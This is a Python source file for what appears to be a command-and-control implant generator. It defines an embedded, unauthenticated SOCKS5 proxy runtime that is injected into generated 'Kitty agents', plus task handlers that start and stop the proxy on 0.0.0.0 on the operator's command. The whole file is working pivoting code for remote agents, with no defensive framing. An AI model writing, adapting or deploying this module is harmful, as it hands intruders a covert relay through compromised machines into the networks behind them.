#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""Embedded SOCKS5 server runtime for generated Python Kitty agents (stdlib only)."""

from __future__ import annotations

# Injected into generated agent scripts before the typed task dispatcher.
EMBEDDED_SOCKS_RUNTIME = (
    "import threading as _ks_th\n"
    "_g_socks_running=False\n"
    "_g_socks_thread=None\n"
    "_g_socks_port=1080\n"
    "def _socks_relay(a,b):\n"
    " try:\n"
    "  while True:\n"
    "   d=a.recv(8192)\n"
    "   if not d: break\n"
    "   b.sendall(d)\n"
    " except Exception: pass\n"
    " finally:\n"
    "  try: a.close()\n"
    "  except Exception: pass\n"
    "  try: b.close()\n"
    "  except Exception: pass\n"
    "def _handle_socks_client(client):\n"
    " try:\n"
    "  buf=client.recv(512)\n"
    "  if len(buf)<2 or buf[0]!=0x05: return\n"
    "  nmethods=buf[1]\n"
    "  if nmethods: client.recv(nmethods)\n"
    "  client.sendall(b'\\x05\\x00')\n"
    "  req=client.recv(4)\n"
    "  if len(req)<4 or req[0]!=0x05 or req[1]!=0x01: return\n"
    "  atyp=req[3]\n"
    "  host=''\n"
    "  if atyp==0x01:\n"
    "   raw=client.recv(4)\n"
    "   if len(raw)<4: return\n"
    "   host='.'.join(str(b) for b in raw)\n"
    "  elif atyp==0x03:\n"
    "   raw=client.recv(1)\n"
    "   if not raw: return\n"
    "   dlen=raw[0]\n"
    "   if not dlen: return\n"
    "   host=client.recv(dlen).decode('ascii','replace')\n"
    "  else: return\n"
    "  pr=client.recv(2)\n"
    "  if len(pr)<2: return\n"
    "  port=(pr[0]<<8)|pr[1]\n"
    "  remote=__import__('socket').create_connection((host,port),timeout=30)\n"
    "  client.sendall(b'\\x05\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00')\n"
    "  t=_ks_th.Thread(target=_socks_relay,args=(remote,client),daemon=True)\n"
    "  t.start()\n"
    "  _socks_relay(client,remote)\n"
    " except Exception:\n"
    "  try: client.sendall(b'\\x05\\x05\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00')\n"
    "  except Exception: pass\n"
    " finally:\n"
    "  try: client.close()\n"
    "  except Exception: pass\n"
    "def _socks_server_main():\n"
    " global _g_socks_running,_g_socks_port\n"
    " srv=__import__('socket').socket(__import__('socket').AF_INET,__import__('socket').SOCK_STREAM)\n"
    " srv.setsockopt(__import__('socket').SOL_SOCKET,__import__('socket').SO_REUSEADDR,1)\n"
    " srv.bind(('0.0.0.0',int(_g_socks_port)))\n"
    " srv.listen(64)\n"
    " srv.settimeout(1.0)\n"
    " while _g_socks_running:\n"
    "  try:\n"
    "   c,_=srv.accept()\n"
    "   _ks_th.Thread(target=_handle_socks_client,args=(c,),daemon=True).start()\n"
    "  except Exception: pass\n"
    " try: srv.close()\n"
    " except Exception: pass\n"
    "def _start_socks(port):\n"
    " global _g_socks_running,_g_socks_thread,_g_socks_port\n"
    " if _g_socks_running: return True\n"
    " _g_socks_port=int(port or 1080) or 1080\n"
    " _g_socks_running=True\n"
    " _g_socks_thread=_ks_th.Thread(target=_socks_server_main,daemon=True)\n"
    " _g_socks_thread.start()\n"
    " return True\n"
    "def _stop_socks():\n"
    " global _g_socks_running\n"
    " _g_socks_running=False\n"
)

SOCKS_TASK_HANDLERS = (
    "    elif cmd in ('socks_start','socks'):\n"
    "     port=int(args.get('port') or 1080)\n"
    "     if _start_socks(port): out='SOCKS5 listening on 0.0.0.0:%s'%_g_socks_port\n"
    "     else: out='ERROR: failed to start SOCKS5'; status='failed'\n"
    "    elif cmd=='socks_stop':\n"
    "     _stop_socks(); out='SOCKS5 stop requested'\n"
)
